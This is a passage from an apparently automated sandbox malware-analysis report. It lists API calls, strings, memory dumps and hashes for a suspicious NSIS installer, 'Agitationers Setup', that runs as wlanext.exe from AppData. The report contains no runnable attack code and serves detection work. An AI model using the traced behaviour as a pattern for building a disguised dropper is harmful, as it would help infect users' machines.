                                                          • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405D74
                                                            • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\AppData\Roaming\wlanext.exe,80000000,00000003), ref: 00405B3D
                                                            • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                          • String ID: %s=%s$[Rename]
                                                          • API String ID: 2171350718-1727408572
                                                          • Opcode ID: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                                                          • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                                                          • Opcode Fuzzy Hash: f5205b29015aadf6075038324b6b1e83a67c9a1e7f2cc145563fcc6b36ef8083
                                                          • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                                                          APIs
                                                          Strings
                                                          • *?|<>/":, xrefs: 00406252
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040620B
                                                          • "C:\Users\user\AppData\Roaming\wlanext.exe" , xrefs: 00406246
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\AppData\Roaming\wlanext.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-1443706174
                                                          • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                          • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                                                          • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                          • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                                                          • GetSysColor.USER32(00000000,?), ref: 00404101
                                                          • SetTextColor.GDI32(?,00000000), ref: 0040410D
                                                          • SetBkMode.GDI32(?,?), ref: 00404119
                                                          • GetSysColor.USER32(?), ref: 0040412C
                                                          • SetBkColor.GDI32(?,?), ref: 0040413C
                                                          • DeleteObject.GDI32(?), ref: 00404156
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404160
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                          • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                                                          • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                          • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                                                          APIs
                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                                                          • GetMessagePos.USER32 ref: 004049B5
                                                          • ScreenToClient.USER32(?,?), ref: 004049CF
                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                          • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                                                          • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                          • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401D9E
                                                          • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DB8
                                                          • MulDiv.KERNEL32 ref: 00401DC0
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                          • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID: Calibri
                                                          • API String ID: 3808545654-1409258342
                                                          • Opcode ID: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                                                          • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                                                          • Opcode Fuzzy Hash: dea405147b320689f0a858fd747f4ba04ef22cc4cc411ef976010452da7bd48b
                                                          • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                          • MulDiv.KERNEL32 ref: 00402CC2
                                                          • wsprintfA.USER32 ref: 00402CD2
                                                          • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402CCC
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                                                          • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                                                          • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                                                          • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                                                          APIs
                                                          • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004055D0
                                                          • GetLastError.KERNEL32 ref: 004055E4
                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055F9
                                                          • GetLastError.KERNEL32 ref: 00405603
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 0040558D
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055B3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming
                                                          • API String ID: 3449924974-1240368958
                                                          • Opcode ID: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                          • Instruction ID: 602471e653a91b50aa3f697eebcabcd82e3e1e6dca1d35eba90d193cad737e86
                                                          • Opcode Fuzzy Hash: 5ed0d1f38f2075833211856a8ebf7d2689aced5b3dcb66e6179e3f4d9a7ce916
                                                          • Instruction Fuzzy Hash: 2D011A71C00219EADF10DFA1C9047EFBBB8EF14355F10803AD545B6290DB799608CFA9
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                          • GlobalFree.KERNEL32(?), ref: 004027EB
                                                          • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                          • CloseHandle.KERNEL32(?), ref: 00402816
                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
                                                          • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                                                          • Opcode Fuzzy Hash: fcec2ffd70543583788ba2543a3bf4a61af8898bf95fefe6a16912793c9a43d2
                                                          • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                                                          APIs
                                                          • lstrlenA.KERNEL32(Agitationers Setup: Completed,Agitationers Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                          • wsprintfA.USER32 ref: 0040492E
                                                          • SetDlgItemTextA.USER32(?,Agitationers Setup: Completed), ref: 00404941
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s$Agitationers Setup: Completed
                                                          • API String ID: 3540041739-230625191
                                                          • Opcode ID: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                                                          • Instruction ID: 1010f8f0fc76c68cf0e8b2cd769f4e8eee9817d82106679565c36b77a1653ccb
                                                          • Opcode Fuzzy Hash: d0db812d9843545440e2aba8227c69b9d11a08aaabcfab80a4719ee44f66ea28
                                                          • Instruction Fuzzy Hash: FB110677A042282BEB00656D9C41EAF3698DB81334F25463BFA65F21D1E978CC1242E9
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E
                                                            • Part of subcall function 004050C7: lstrlenA.KERNEL32(Completed,00000000,00420FD4,756F110C,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                            • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,Completed,00000000,00420FD4,756F110C,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                            • Part of subcall function 004050C7: lstrcatA.KERNEL32(Completed,004030F7,004030F7,Completed,00000000,00420FD4,756F110C), ref: 00405123
                                                            • Part of subcall function 004050C7: SetWindowTextA.USER32(Completed,Completed), ref: 00405135
                                                            • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000,Completed,00000000,00420FD4,756F110C), ref: 0040515B
                                                            • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                            • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
                                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 0040204E
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 004020B8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID: Triu,fe$
                                                          • API String ID: 2987980305-1397165661
                                                          • Opcode ID: 0598aedd2e82f7c10ba8bbc91bea3857830168508908e3d575a2ec50418c3e61
                                                          • Instruction ID: c1ae46b168e5b47a3396f215b5b678e2f7e13ad55da110dce54edd367ac60368
                                                          • Opcode Fuzzy Hash: 0598aedd2e82f7c10ba8bbc91bea3857830168508908e3d575a2ec50418c3e61
                                                          • Instruction Fuzzy Hash: D221C671A00215ABCF207FA48F4DBAE7A70AB54319F60413BE601B21D0CBBD49429A6E
                                                          APIs
                                                          • GetDlgItem.USER32(?), ref: 00401D45
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                          • SendMessageA.USER32(00000000,00000172,?,00000000,?,00000000,?,?,?,?,00000010), ref: 00401D81
                                                          • DeleteObject.GDI32(00000000), ref: 00401D90
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: eb7aa93c274721a82f813915abcb93972a2dce3b863b89ff8b0ac985c59b3657
                                                          • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                                                          • Opcode Fuzzy Hash: eb7aa93c274721a82f813915abcb93972a2dce3b863b89ff8b0ac985c59b3657
                                                          • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                          • SendMessageA.USER32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000004,00000003), ref: 00401C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                                                          • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                                                          • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                                                          • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                                                          APIs
                                                            • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,Agitationers Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                                            • Part of subcall function 004059D1: CharNextA.USER32(?), ref: 004059DF
                                                            • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                            • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                          • lstrlenA.KERNEL32(0042BC78,00000000,0042BC78,0042BC78,T'qu,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A79
                                                          • GetFileAttributesA.KERNEL32(0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,0042BC78,00000000,0042BC78,0042BC78,T'qu,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 00405A89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$T'qu
                                                          • API String ID: 3248276644-3553432588
                                                          • Opcode ID: fd356b8919337fe01a24efca68e850dbe45d0084ba8af47b2787d0181ceea021
